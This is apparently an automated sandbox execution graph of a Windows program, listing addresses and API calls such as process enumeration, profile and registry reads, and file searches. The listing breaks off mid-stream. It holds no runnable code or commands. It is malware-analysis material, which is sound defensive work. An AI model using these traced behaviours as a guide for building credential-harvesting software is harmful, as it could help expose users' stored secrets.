                                                                execution_graph 37711 4466f4 37730 446904 37711->37730 37713 446700 GetModuleHandleA 37716 446710 __set_app_type __p__fmode __p__commode 37713->37716 37715 4467a4 37717 4467ac __setusermatherr 37715->37717 37718 4467b8 37715->37718 37716->37715 37717->37718 37731 4468f0 _controlfp 37718->37731 37720 4467bd _initterm GetEnvironmentStringsW _initterm 37721 44681e GetStartupInfoW 37720->37721 37722 446810 37720->37722 37724 446866 GetModuleHandleA 37721->37724 37732 41276d 37724->37732 37728 446896 exit 37729 44689d _cexit 37728->37729 37729->37722 37730->37713 37731->37720 37733 41277d 37732->37733 37775 4044a4 LoadLibraryW 37733->37775 37735 412785 37736 412789 37735->37736 37781 414b81 37735->37781 37736->37728 37736->37729 37739 4127c8 37785 412465 memset ??2@YAPAXI 37739->37785 37741 4127ea 37797 40ac21 37741->37797 37746 412813 37815 40dd07 memset 37746->37815 37747 412827 37820 40db69 memset 37747->37820 37750 412822 37842 4125b6 ??3@YAXPAX DeleteObject 37750->37842 37752 40ada2 _wcsicmp 37753 41283d 37752->37753 37753->37750 37757 412863 CoInitialize 37753->37757 37825 41268e 37753->37825 37755 412966 37843 40b1ab ??3@YAXPAX ??3@YAXPAX 37755->37843 37841 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37757->37841 37758 41296f 37844 40b633 37758->37844 37761 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37767 412957 CoUninitialize 37761->37767 37772 4128ca 37761->37772 37767->37750 37768 4128d0 TranslateAcceleratorW 37769 412941 GetMessageW 37768->37769 37768->37772 37769->37767 37769->37768 37770 412909 IsDialogMessageW 37770->37769 37770->37772 37771 4128fd IsDialogMessageW 37771->37769 37771->37770 37772->37768 37772->37770 37772->37771 37773 41292b TranslateMessage DispatchMessageW 37772->37773 37774 41291f IsDialogMessageW 37772->37774 37773->37769 37774->37769 37774->37773 37776 4044cf FreeLibrary 37775->37776 37778 4044f3 37775->37778 37776->37778 37779 404507 MessageBoxW 37778->37779 37780 40451e 37778->37780 37779->37735 37780->37735 37782 414b8a 37781->37782 37783 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37781->37783 37848 40a804 memset 37782->37848 37783->37739 37786 4124e0 37785->37786 37787 412505 ??2@YAPAXI 37786->37787 37788 41251c 37787->37788 37791 412521 37787->37791 37870 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37788->37870 37859 444722 37791->37859 37796 41259b wcscpy 37796->37741 37875 40b1ab ??3@YAXPAX ??3@YAXPAX 37797->37875 37801 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37804 40ac5c 37801->37804 37802 40ad4b 37810 40ad76 37802->37810 37899 40a9ce 37802->37899 37804->37801 37804->37802 37805 40ace7 ??3@YAXPAX 37804->37805 37804->37810 37879 40a8d0 37804->37879 37891 4099f4 37804->37891 37805->37804 37809 40a8d0 7 API calls 37809->37810 37876 40aa04 37810->37876 37811 40ada2 37812 40adc9 37811->37812 37814 40adaa 37811->37814 37812->37746 37812->37747 37813 40adb3 _wcsicmp 37813->37812 37813->37814 37814->37812 37814->37813 37904 40dce0 37815->37904 37817 40dd3a GetModuleHandleW 37909 40dba7 37817->37909 37821 40dce0 3 API calls 37820->37821 37822 40db99 37821->37822 37981 40dae1 37822->37981 37995 402f3a 37825->37995 37827 4126a8 37828 412766 37827->37828 37829 4126d3 _wcsicmp 37827->37829 37831 41270a 37827->37831 38029 4125f8 7 API calls 37827->38029 37828->37750 37828->37757 37829->37827 37831->37828 37998 411ac5 37831->37998 37841->37761 37842->37755 37843->37758 37845 40b640 37844->37845 37846 40b639 ??3@YAXPAX 37844->37846 37847 40b1ab ??3@YAXPAX ??3@YAXPAX 37845->37847 37846->37845 37847->37736 37849 40a83b GetSystemDirectoryW 37848->37849 37850 40a84c wcscpy 37848->37850 37849->37850 37855 409719 wcslen 37850->37855 37853 40a881 LoadLibraryW 37854 40a886 37853->37854 37854->37783 37856 409724 37855->37856 37857 409739 wcscat LoadLibraryW 37855->37857 37856->37857 37858 40972c wcscat 37856->37858 37857->37853 37857->37854 37858->37857 37860 444732 37859->37860 37861 444728 DeleteObject 37859->37861 37871 409cc3 37860->37871 37861->37860 37863 412551 37864 4010f9 37863->37864 37865 401130 37864->37865 37866 401134 GetModuleHandleW LoadIconW 37865->37866 37867 401107 wcsncat 37865->37867 37868 40a7be 37866->37868 37867->37865 37869 40a7d2 37868->37869 37869->37796 37869->37869 37870->37791 37874 409bfd memset wcscpy 37871->37874 37873 409cdb CreateFontIndirectW 37873->37863 37874->37873 37875->37804 37877 40aa14 37876->37877 37878 40aa0a ??3@YAXPAX 37876->37878 37877->37811 37878->37877 37880 40a8eb 37879->37880 37881 40a8df wcslen 37879->37881 37882 40a906 ??3@YAXPAX 37880->37882 37883 40a90f 37880->37883 37881->37880 37884 40a919 37882->37884 37885 4099f4 3 API calls 37883->37885 37886 40a932 37884->37886 37887 40a929 ??3@YAXPAX 37884->37887 37885->37884 37889 4099f4 3 API calls 37886->37889 37888 40a93e memcpy 37887->37888 37888->37804 37890 40a93d 37889->37890 37890->37888 37892 409a41 37891->37892 37893 4099fb malloc 37891->37893 37892->37804 37895 409a37 37893->37895 37896 409a1c 37893->37896 37895->37804 37897 409a30 ??3@YAXPAX 37896->37897 37898 409a20 memcpy 37896->37898 37897->37895 37898->37897 37900 40a9e7 37899->37900 37901 40a9dc ??3@YAXPAX 37899->37901 37902 4099f4 3 API calls 37900->37902 37903 40a9f2 37901->37903 37902->37903 37903->37809 37928 409bca GetModuleFileNameW 37904->37928 37906 40dce6 wcsrchr 37907 40dcf5 37906->37907 37908 40dcf9 wcscat 37906->37908 37907->37908 37908->37817 37929 44db70 37909->37929 37913 40dbfd 37932 4447d9 37913->37932 37916 40dc34 wcscpy wcscpy 37958 40d6f5 37916->37958 37917 40dc1f wcscpy 37917->37916 37920 40d6f5 3 API calls 37921 40dc73 37920->37921 37922 40d6f5 3 API calls 37921->37922 37923 40dc89 37922->37923 37924 40d6f5 3 API calls 37923->37924 37925 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37924->37925 37964 40da80 37925->37964 37928->37906 37930 40dbb4 memset memset 37929->37930 37931 409bca GetModuleFileNameW 37930->37931 37931->37913 37934 4447f4 37932->37934 37933 40dc1b 37933->37916 37933->37917 37934->37933 37935 444807 ??2@YAPAXI 37934->37935 37936 44481f 37935->37936 37937 444873 _snwprintf 37936->37937 37938 4448ab wcscpy 37936->37938 37971 44474a 8 API calls 37937->37971 37940 4448bb 37938->37940 37972 44474a 8 API calls 37940->37972 37941 4448a7 37941->37938 37941->37940 37943 4448cd 37973 44474a 8 API calls 37943->37973 37945 4448e2 37974 44474a 8 API calls 37945->37974 37947 4448f7 37975 44474a 8 API calls 37947->37975 37949 44490c 37976 44474a 8 API calls 37949->37976 37951 444921 37977 44474a 8 API calls 37951->37977 37953 444936 37978 44474a 8 API calls 37953->37978 37955 44494b 37979 44474a 8 API calls 37955->37979 37957 444960 ??3@YAXPAX 37957->37933 37959 44db70 37958->37959 37960 40d702 memset GetPrivateProfileStringW 37959->37960 37961 40d752 37960->37961 37962 40d75c WritePrivateProfileStringW 37960->37962 37961->37962 37963 40d758 37961->37963 37962->37963 37963->37920 37965 44db70 37964->37965 37966 40da8d memset 37965->37966 37967 40daac LoadStringW 37966->37967 37968 40dac6 37967->37968 37968->37967 37970 40dade 37968->37970 37980 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37968->37980 37970->37750 37971->37941 37972->37943 37973->37945 37974->37947 37975->37949 37976->37951 37977->37953 37978->37955 37979->37957 37980->37968 37991 409b98 GetFileAttributesW 37981->37991 37983 40daea 37984 40db63 37983->37984 37985 40daef wcscpy wcscpy GetPrivateProfileIntW 37983->37985 37984->37752 37992 40d65d GetPrivateProfileStringW 37985->37992 37987 40db3e 37993 40d65d GetPrivateProfileStringW 37987->37993 37989 40db4f 37994 40d65d GetPrivateProfileStringW 37989->37994 37991->37983 37992->37987 37993->37989 37994->37984 38030 40eaff 37995->38030 37999 411ae2 memset 37998->37999 38000 411b8f 37998->38000 38071 409bca GetModuleFileNameW 37999->38071 38012 411a8b 38000->38012 38002 411b0a wcsrchr 38003 411b22 wcscat 38002->38003 38004 411b1f 38002->38004 38072 414770 wcscpy wcscpy wcscpy CloseHandle 38003->38072 38004->38003 38006 411b67 38073 402afb 38006->38073 38010 411b7f 38129 40ea13 SendMessageW memset SendMessageW 38010->38129 38013 402afb 27 API calls 38012->38013 38014 411ac0 38013->38014 38015 4110dc 38014->38015 38016 41113e 38015->38016 38021 4110f0 38015->38021 38154 40969c LoadCursorW SetCursor 38016->38154 38018 411143 38155 4032b4 38018->38155 38173 444a54 38018->38173 38019 4110f7 _wcsicmp 38019->38021 38020 411157 38022 40ada2 _wcsicmp 38020->38022 38021->38016 38021->38019 38176 410c46 10 API calls 38021->38176 38025 411167 38022->38025 38023 4111af 38025->38023 38026 4111a6 qsort 38025->38026 38026->38023 38029->37827 38031 40eb10 38030->38031 38044 40e8e0 38031->38044 38034 40eb6c memcpy memcpy 38035 40ebe1 38034->38035 38038 40ebb7 38034->38038 38035->38034 38037 40ebf2 ??2@YAPAXI ??2@YAPAXI 38035->38037 38036 40d134 16 API calls 38036->38038 38039 40ec2e ??2@YAPAXI 38037->38039 38042 40ec65 38037->38042 38038->38035 38038->38036 38039->38042 38042->38042 38054 40ea7f 38042->38054 38043 402f49 38043->37827 38045 40e8f2 38044->38045 38046 40e8eb ??3@YAXPAX 38044->38046 38047 40e900 38045->38047 38048 40e8f9 ??3@YAXPAX 38045->38048 38046->38045 38049 40e911 38047->38049 38050 40e90a ??3@YAXPAX 38047->38050 38048->38047 38051 40e931 ??2@YAPAXI ??2@YAPAXI 38049->38051 38052 40e921 ??3@YAXPAX 38049->38052 38053 40e92a ??3@YAXPAX 38049->38053 38050->38049 38051->38034 38052->38053 38053->38051 38055 40aa04 ??3@YAXPAX 38054->38055 38056 40ea88 38055->38056 38057 40aa04 ??3@YAXPAX 38056->38057 38058 40ea90 38057->38058 38059 40aa04 ??3@YAXPAX 38058->38059 38060 40ea98 38059->38060 38061 40aa04 ??3@YAXPAX 38060->38061 38062 40eaa0 38061->38062 38063 40a9ce 4 API calls 38062->38063 38064 40eab3 38063->38064 38065 40a9ce 4 API calls 38064->38065 38066 40eabd 38065->38066 38067 40a9ce 4 API calls 38066->38067 38068 40eac7 38067->38068 38069 40a9ce 4 API calls 38068->38069 38070 40ead1 38069->38070 38070->38043 38071->38002 38072->38006 38130 40b2cc 38073->38130 38075 402b0a 38076 40b2cc 27 API calls 38075->38076 38077 402b23 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402b3a 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402b54 38080->38081 38082 40b2cc 27 API calls 38081->38082 38083 402b6b 38082->38083 38084 40b2cc 27 API calls 38083->38084 38085 402b82 38084->38085 38086 40b2cc 27 API calls 38085->38086 38087 402b99 38086->38087 38088 40b2cc 27 API calls 38087->38088 38089 402bb0 38088->38089 38090 40b2cc 27 API calls 38089->38090 38091 402bc7 38090->38091 38092 40b2cc 27 API calls 38091->38092 38093 402bde 38092->38093 38094 40b2cc 27 API calls 38093->38094 38095 402bf5 38094->38095 38096 40b2cc 27 API calls 38095->38096 38097 402c0c 38096->38097 38098 40b2cc 27 API calls 38097->38098 38099 402c23 38098->38099 38100 40b2cc 27 API calls 38099->38100 38101 402c3a 38100->38101 38102 40b2cc 27 API calls 38101->38102 38103 402c51 38102->38103 38104 40b2cc 27 API calls 38103->38104 38105 402c68 38104->38105 38106 40b2cc 27 API calls 38105->38106 38107 402c7f 38106->38107 38108 40b2cc 27 API calls 38107->38108 38109 402c99 38108->38109 38110 40b2cc 27 API calls 38109->38110 38111 402cb3 38110->38111 38112 40b2cc 27 API calls 38111->38112 38113 402cd5 38112->38113 38114 40b2cc 27 API calls 38113->38114 38115 402cf0 38114->38115 38116 40b2cc 27 API calls 38115->38116 38117 402d0b 38116->38117 38118 40b2cc 27 API calls 38117->38118 38119 402d26 38118->38119 38120 40b2cc 27 API calls 38119->38120 38121 402d3e 38120->38121 38122 40b2cc 27 API calls 38121->38122 38123 402d59 38122->38123 38124 40b2cc 27 API calls 38123->38124 38125 402d78 38124->38125 38126 40b2cc 27 API calls 38125->38126 38127 402d93 38126->38127 38128 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38127->38128 38128->38010 38129->38000 38133 40b58d 38130->38133 38132 40b2d1 38132->38075 38134 40b5a4 GetModuleHandleW FindResourceW 38133->38134 38135 40b62e 38133->38135 38136 40b5c2 LoadResource 38134->38136 38138 40b5e7 38134->38138 38135->38132 38137 40b5d0 SizeofResource LockResource 38136->38137 38136->38138 38137->38138 38138->38135 38146 40afcf 38138->38146 38140 40b608 memcpy 38149 40b4d3 memcpy 38140->38149 38142 40b61e 38150 40b3c1 18 API calls 38142->38150 38144 40b626 38151 40b04b 38144->38151 38147 40b04b ??3@YAXPAX 38146->38147 38148 40afd7 ??2@YAPAXI 38147->38148 38148->38140 38149->38142 38150->38144 38152 40b051 ??3@YAXPAX 38151->38152 38153 40b05f 38151->38153 38152->38153 38153->38135 38154->38018 38156 4032c4 38155->38156 38157 40b633 ??3@YAXPAX 38156->38157 38158 403316 38157->38158 38177 44553b 38158->38177 38162 403480 38375 40368c 15 API calls 38162->38375 38164 403489 38165 40b633 ??3@YAXPAX 38164->38165 38167 403495 38165->38167 38166 40333c 38166->38162 38168 4033a9 memset memcpy 38166->38168 38169 4033ec wcscmp 38166->38169 38373 4028e7 11 API calls 38166->38373 38374 40f508 6 API calls 38166->38374 38167->38020 38168->38166 38168->38169 38169->38166 38171 403421 _wcsicmp 38171->38166 38174 444a64 FreeLibrary 38173->38174 38175 444a83 38173->38175 38174->38175 38175->38020 38176->38021 38178 445548 38177->38178 38179 445599 38178->38179 38376 40c768 38178->38376 38180 4455a8 memset 38179->38180 38188 4457f2 38179->38188 38460 403988 38180->38460 38186 4455e5 38193 445672 38186->38193 38206 44560f 38186->38206 38191 445854 38188->38191 38563 403e2d memset memset memset memset memset 38188->38563 38189 4458bb memset memset 38196 414c2e 16 API calls 38189->38196 38243 4458aa 38191->38243 38586 403c9c memset memset memset memset memset 38191->38586 38471 403fbe memset memset memset memset memset 38193->38471 38194 4459ed 38201 445a00 memset memset 38194->38201 38202 445b22 38194->38202 38195 44595e memset memset 38203 414c2e 16 API calls 38195->38203 38197 4458f9 38196->38197 38204 40b2cc 27 API calls 38197->38204 38198 44558c 38444 444b06 38198->38444 38199 44557a 38199->38198 38440 4136c0 38199->38440 38212 414c2e 16 API calls 38201->38212 38208 445bca 38202->38208 38209 445b38 memset memset memset 38202->38209 38213 44599c 38203->38213 38214 445909 38204->38214 38218 4087b3 335 API calls 38206->38218 38207 445849 38654 40b1ab ??3@YAXPAX ??3@YAXPAX 38207->38654 38215 445c8b memset memset 38208->38215 38281 445cf0 38208->38281 38219 445bd4 38209->38219 38220 445b98 38209->38220 38221 445a3e 38212->38221 38223 40b2cc 27 API calls 38213->38223 38224 409d1f 6 API calls 38214->38224 38228 414c2e 16 API calls 38215->38228 38217 44589f 38655 40b1ab ??3@YAXPAX ??3@YAXPAX 38217->38655 38225 445621 38218->38225 38609 414c2e 38219->38609 38220->38219 38230 445ba2 38220->38230 38233 40b2cc 27 API calls 38221->38233 38227 4459ac 38223->38227 38238 445919 38224->38238 38640 4454bf 20 API calls 38225->38640 38226 445823 38226->38207 38248 4087b3 335 API calls 38226->38248 38239 409d1f 6 API calls 38227->38239 38240 445cc9 38228->38240 38745 4099c6 wcslen 38230->38745 38231 4456b2 38642 40b1ab ??3@YAXPAX ??3@YAXPAX 38231->38642 38244 445a4f 38233->38244 38235 403335 38372 4452e5 43 API calls 38235->38372 38236 445d3d 38266 40b2cc 27 API calls 38236->38266 38237 445d88 memset memset memset 38249 414c2e 16 API calls 38237->38249 38656 409b98 GetFileAttributesW 38238->38656 38250 4459bc 38239->38250 38251 409d1f 6 API calls 38240->38251 38241 445879 38241->38217 38262 4087b3 335 API calls 38241->38262 38243->38189 38267 44594a 38243->38267 38254 409d1f 6 API calls 38244->38254 38248->38226 38259 445dde 38249->38259 38721 409b98 GetFileAttributesW 38250->38721 38261 445ce1 38251->38261 38252 445bb3 38748 445403 memset 38252->38748 38253 445680 38253->38231 38494 4087b3 memset 38253->38494 38264 445a63 38254->38264 38255 40b2cc 27 API calls 38256 445bf3 38255->38256 38625 409d1f wcslen wcslen 38256->38625 38257 445928 38257->38267 38657 40b6ef 38257->38657 38268 40b2cc 27 API calls 38259->38268 38765 409b98 GetFileAttributesW 38261->38765 38262->38241 38273 40b2cc 27 API calls 38264->38273 38277 445d54 _wcsicmp 38266->38277 38267->38194 38267->38195 38280 445def 38268->38280 38269 4459cb 38269->38194 38289 40b6ef 249 API calls 38269->38289 38274 445a94 38273->38274 38722 40ae18 38274->38722 38275 44566d 38275->38188 38545 413d4c 38275->38545 38286 445d71 38277->38286 38351 445d67 38277->38351 38279 445665 38641 40b1ab ??3@YAXPAX ??3@YAXPAX 38279->38641 38287 409d1f 6 API calls 38280->38287 38281->38235 38281->38236 38281->38237 38282 445389 255 API calls 38282->38208 38766 445093 23 API calls 38286->38766 38294 445e03 38287->38294 38289->38194 38290 4456d8 38296 40b2cc 27 API calls 38290->38296 38293 44563c 38293->38279 38299 4087b3 335 API calls 38293->38299 38767 409b98 GetFileAttributesW 38294->38767 38295 40b6ef 249 API calls 38295->38235 38301 4456e2 38296->38301 38297 40b2cc 27 API calls 38302 445c23 38297->38302 38298 445d83 38298->38235 38299->38293 38643 413fa6 _wcsicmp _wcsicmp 38301->38643 38306 409d1f 6 API calls 38302->38306 38304 445e12 38310 445e6b 38304->38310 38316 40b2cc 27 API calls 38304->38316 38308 445c37 38306->38308 38307 4456eb 38312 4456fd memset memset memset memset 38307->38312 38313 4457ea 38307->38313 38314 445389 255 API calls 38308->38314 38309 445b17 38742 40aebe 38309->38742 38769 445093 23 API calls 38310->38769 38644 409c70 wcscpy wcsrchr 38312->38644 38647 413d29 38313->38647 38319 445c47 38314->38319 38320 445e33 38316->38320 38326 40b2cc 27 API calls 38319->38326 38327 409d1f 6 API calls 38320->38327 38322 445e7e 38323 445f67 38322->38323 38332 40b2cc 27 API calls 38323->38332 38324 445ab2 memset 38328 40b2cc 27 API calls 38324->38328 38330 445c53 38326->38330 38331 445e47 38327->38331 38333 445aa1 38328->38333 38329 409c70 2 API calls 38334 44577e 38329->38334 38335 409d1f 6 API calls 38330->38335 38768 409b98 GetFileAttributesW 38331->38768 38337 445f73 38332->38337 38333->38309 38333->38324 38338 409d1f 6 API calls 38333->38338 38346 445389 255 API calls 38333->38346 38729 40add4 38333->38729 38734 40ae51 38333->38734 38339 409c70 2 API calls 38334->38339 38340 445c67 38335->38340 38342 409d1f 6 API calls 38337->38342 38338->38333 38343 44578d 38339->38343 38344 445389 255 API calls 38340->38344 38341 445e56 38341->38310 38347 445e83 memset 38341->38347 38345 445f87 38342->38345 38343->38313 38350 40b2cc 27 API calls 38343->38350 38344->38208 38772 409b98 GetFileAttributesW 38345->38772 38346->38333 38349 40b2cc 27 API calls 38347->38349 38352 445eab 38349->38352 38353 4457a8 38350->38353 38351->38235 38351->38295 38354 409d1f 6 API calls 38352->38354 38355 409d1f 6 API calls 38353->38355 38356 445ebf 38354->38356 38357 4457b8 38355->38357 38358 40ae18 9 API calls 38356->38358 38646 409b98 GetFileAttributesW 38357->38646 38368 445ef5 38358->38368 38360 4457c7 38360->38313 38362 4087b3 335 API calls 38360->38362 38361 40ae51 9 API calls 38361->38368 38362->38313 38363 445f5c 38365 40aebe FindClose 38363->38365 38364 40add4 2 API calls 38364->38368 38365->38323 38366 40b2cc 27 API calls 38366->38368 38367 409d1f 6 API calls 38367->38368 38368->38361 38368->38363 38368->38364 38368->38366 38368->38367 38370 445f3a 38368->38370 38770 409b98 GetFileAttributesW 38368->38770 38771 445093 23 API calls 38370->38771 38372->38166 38373->38171 38374->38166 38375->38164 38377 40c775 38376->38377 38773 40b1ab ??3@YAXPAX ??3@YAXPAX 38377->38773 38379 40c788 38774 40b1ab ??3@YAXPAX ??3@YAXPAX 38379->38774 38381 40c790 38775 40b1ab ??3@YAXPAX ??3@YAXPAX 38381->38775 38383 40c798 38384 40aa04 ??3@YAXPAX 38383->38384 38385 40c7a0 38384->38385 38776 40c274 memset 38385->38776 38390 40a8ab 9 API calls 38391 40c7c3 38390->38391 38392 40a8ab 9 API calls 38391->38392 38393 40c7d0 38392->38393 38805 40c3c3 38393->38805 38397 40c877 38406 40bdb0 38397->38406 38398 40c86c 38833 4053fe 37 API calls 38398->38833 38401 40c813 _wcslwr 38831 40c634 47 API calls 38401->38831 38403 40c829 wcslen 38404 40c7e5 38403->38404 38404->38397 38404->38398 38830 40a706 wcslen memcpy 38404->38830 38832 40c634 47 API calls 38404->38832 38967 404363 38406->38967 38408 40bf5d 38984 40440c 38408->38984 38412 40b2cc 27 API calls 38413 40be02 wcslen 38412->38413 38413->38408 38420 40be1e 38413->38420 38414 40be26 _wcsncoll 38414->38420 38417 40be7d memset 38418 40bea7 memcpy 38417->38418 38417->38420 38419 40bf11 wcschr 38418->38419 38418->38420 38419->38420 38420->38408 38420->38414 38420->38417 38420->38418 38420->38419 38421 40b2cc 27 API calls 38420->38421 38423 40bf43 LocalFree 38420->38423 38987 40bd5d 28 API calls 38420->38987 38988 404423 38420->38988 38422 40bef6 _wcsnicmp 38421->38422 38422->38419 38422->38420 38423->38420 38424 4135f7 39000 4135e0 38424->39000 38427 40b2cc 27 API calls 38428 41360d 38427->38428 38429 40a804 8 API calls 38428->38429 38430 413613 38429->38430 38431 41363e 38430->38431 38432 40b273 27 API calls 38430->38432 38433 4135e0 FreeLibrary 38431->38433 38434 413625 38432->38434 38435 413643 38433->38435 38434->38431 38436 413648 38434->38436 38435->38199 38437 413658 38436->38437 38438 4135e0 FreeLibrary 38436->38438 38437->38199 38439 413666 38438->38439 38439->38199 38442 4136e2 38440->38442 38441 413827 38639 41366b FreeLibrary 38441->38639 38442->38441 38443 4137ac CoTaskMemFree 38442->38443 38443->38442 39003 4449b9 38444->39003 38447 444c1f 38447->38179 38448 4449b9 35 API calls 38450 444b4b 38448->38450 38449 444c15 38452 4449b9 35 API calls 38449->38452 38450->38449 39023 444972 GetVersionExW 38450->39023 38452->38447 38453 444b99 memcmp 38458 444b8c 38453->38458 38454 444c0b 39027 444a85 35 API calls 38454->39027 38458->38453 38458->38454 39024 444aa5 35 API calls 38458->39024 39025 40a7a0 GetVersionExW 38458->39025 39026 444a85 35 API calls 38458->39026 38461 40399d 38460->38461 39028 403a16 38461->39028 38463 403a09 39042 40b1ab ??3@YAXPAX ??3@YAXPAX 38463->39042 38465 403a12 wcsrchr 38465->38186 38466 4039a3 38466->38463 38469 4039f4 38466->38469 39039 40a02c CreateFileW 38466->39039 38469->38463 38470 4099c6 2 API calls 38469->38470 38470->38463 38472 414c2e 16 API calls 38471->38472 38473 404048 38472->38473 38474 414c2e 16 API calls 38473->38474 38475 404056 38474->38475 38476 409d1f 6 API calls 38475->38476 38477 404073 38476->38477 38478 409d1f 6 API calls 38477->38478 38479 40408e 38478->38479 38480 409d1f 6 API calls 38479->38480 38481 4040a6 38480->38481 38482 403af5 20 API calls 38481->38482 38483 4040ba 38482->38483 38484 403af5 20 API calls 38483->38484 38485 4040cb 38484->38485 39069 40414f memset 38485->39069 38487 404140 39083 40b1ab ??3@YAXPAX ??3@YAXPAX 38487->39083 38489 4040ec memset 38491 4040e0 38489->38491 38490 404148 38490->38253 38491->38487 38491->38489 38492 4099c6 2 API calls 38491->38492 38493 40a8ab 9 API calls 38491->38493 38492->38491 38493->38491 39096 40a6e6 WideCharToMultiByte 38494->39096 38496 4087ed 39097 4095d9 memset 38496->39097 38499 408809 memset memset memset memset memset 38500 40b2cc 27 API calls 38499->38500 38501 4088a1 38500->38501 38502 409d1f 6 API calls 38501->38502 38503 4088b1 38502->38503 38504 40b2cc 27 API calls 38503->38504 38505 4088c0 38504->38505 38506 409d1f 6 API calls 38505->38506 38507 4088d0 38506->38507 38508 40b2cc 27 API calls 38507->38508 38509 4088df 38508->38509 38510 409d1f 6 API calls 38509->38510 38511 4088ef 38510->38511 38512 40b2cc 27 API calls 38511->38512 38513 4088fe 38512->38513 38543 408953 38543->38253 38546 40b633 ??3@YAXPAX 38545->38546 38547 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38546->38547 38548 413f00 Process32NextW 38547->38548 38549 413da5 OpenProcess 38548->38549 38550 413f17 CloseHandle 38548->38550 38551 413df3 memset 38549->38551 38554 413eb0 38549->38554 38550->38290 39146 413f27 38551->39146 38553 413ebf ??3@YAXPAX 38553->38554 38554->38548 38554->38553 38555 4099f4 3 API calls 38554->38555 38555->38554 38557 413e37 GetModuleHandleW 38558 413e1f 38557->38558 38559 413e46 38557->38559 38558->38557 38560 413e6a QueryFullProcessImageNameW 38558->38560 39151 413959 38558->39151 39167 413ca4 38558->39167 38559->38558 38560->38558 38562 413ea2 CloseHandle 38562->38554 38564 414c2e 16 API calls 38563->38564 38565 403eb7 38564->38565 38566 414c2e 16 API calls 38565->38566 38567 403ec5 38566->38567 38568 409d1f 6 API calls 38567->38568 38569 403ee2 38568->38569 38570 409d1f 6 API calls 38569->38570 38571 403efd 38570->38571 38572 409d1f 6 API calls 38571->38572 38573 403f15 38572->38573 38574 403af5 20 API calls 38573->38574 38575 403f29 38574->38575 38576 403af5 20 API calls 38575->38576 38577 403f3a 38576->38577 38578 40414f 33 API calls 38577->38578 38579 403f4f 38578->38579 38580 403faf 38579->38580 38582 403f5b memset 38579->38582 38584 4099c6 2 API calls 38579->38584 38585 40a8ab 9 API calls 38579->38585 39180 40b1ab ??3@YAXPAX ??3@YAXPAX 38580->39180 38582->38579 38583 403fb7 38583->38226 38584->38579 38585->38579 38587 414c2e 16 API calls 38586->38587 38588 403d26 38587->38588 38589 414c2e 16 API calls 38588->38589 38590 403d34 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 403d51 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 403d6c 38593->38594 38595 409d1f 6 API calls 38594->38595 38596 403d84 38595->38596 38597 403af5 20 API calls 38596->38597 38598 403d98 38597->38598 38599 403af5 20 API calls 38598->38599 38600 403da9 38599->38600 38601 40414f 33 API calls 38600->38601 38602 403dbe 38601->38602 38603 403e1e 38602->38603 38605 403dca memset 38602->38605 38607 4099c6 2 API calls 38602->38607 38608 40a8ab 9 API calls 38602->38608 39181 40b1ab ??3@YAXPAX ??3@YAXPAX 38603->39181 38605->38602 38606 403e26 38606->38241 38607->38602 38608->38602 38610 414b81 8 API calls 38609->38610 38611 414c40 38610->38611 38612 414c73 memset 38611->38612 39182 409cea 38611->39182 38613 414c94 38612->38613 39185 414592 RegOpenKeyExW 38613->39185 38617 414c64 SHGetSpecialFolderPathW 38619 414d0b 38617->38619 38618 414cc1 38620 414cf4 wcscpy 38618->38620 39186 414bb0 wcscpy 38618->39186 38619->38255 38620->38619 38622 414cd2 39187 4145ac RegQueryValueExW 38622->39187 38624 414ce9 RegCloseKey 38624->38620 38626 409d62 38625->38626 38627 409d43 wcscpy 38625->38627 38630 445389 38626->38630 38628 409719 2 API calls 38627->38628 38629 409d51 wcscat 38628->38629 38629->38626 38631 40ae18 9 API calls 38630->38631 38637 4453c4 38631->38637 38632 40ae51 9 API calls 38632->38637 38633 4453f3 38635 40aebe FindClose 38633->38635 38634 40add4 2 API calls 38634->38637 38636 4453fe 38635->38636 38636->38297 38637->38632 38637->38633 38637->38634 38638 445403 250 API calls 38637->38638 38638->38637 38639->38198 38640->38293 38641->38275 38642->38275 38643->38307 38645 409c89 38644->38645 38645->38329 38646->38360 38648 413d39 38647->38648 38649 413d2f FreeLibrary 38647->38649 38650 40b633 ??3@YAXPAX 38648->38650 38649->38648 38651 413d42 38650->38651 38652 40b633 ??3@YAXPAX 38651->38652 38653 413d4a 38652->38653 38653->38188 38654->38191 38655->38243 38656->38257 38658 44db70 38657->38658 38659 40b6fc memset 38658->38659 38660 409c70 2 API calls 38659->38660 38661 40b732 wcsrchr 38660->38661 38662 40b743 38661->38662 38663 40b746 memset 38661->38663 38662->38663 38664 40b2cc 27 API calls 38663->38664 38665 40b76f 38664->38665 38666 409d1f 6 API calls 38665->38666 38667 40b783 38666->38667 39188 409b98 GetFileAttributesW 38667->39188 38669 40b792 38670 409c70 2 API calls 38669->38670 38684 40b7c2 38669->38684 38672 40b7a5 38670->38672 38674 40b2cc 27 API calls 38672->38674 38678 40b7b2 38674->38678 38675 40b837 CloseHandle 38677 40b83e memset 38675->38677 38676 40b817 39272 409a45 GetTempPathW 38676->39272 39222 40a6e6 WideCharToMultiByte 38677->39222 38681 409d1f 6 API calls 38678->38681 38681->38684 38682 40b827 38682->38677 38683 40b866 39223 444432 38683->39223 39189 40bb98 38684->39189 38687 40bad5 38690 40b04b ??3@YAXPAX 38687->38690 38688 40b273 27 API calls 38689 40b89a 38688->38689 39269 438552 38689->39269 38691 40baf3 38690->38691 38691->38267 38694 40bacd 39303 443d90 110 API calls 38694->39303 38697 40bac6 39302 424f26 122 API calls 38697->39302 38698 40b8bd memset 39293 425413 17 API calls 38698->39293 38701 425413 17 API calls 38719 40b8b8 38701->38719 38704 40a71b MultiByteToWideChar 38704->38719 38705 40a734 MultiByteToWideChar 38705->38719 38708 40b9b5 memcmp 38708->38719 38709 4099c6 2 API calls 38709->38719 38710 404423 37 API calls 38710->38719 38713 4251c4 136 API calls 38713->38719 38714 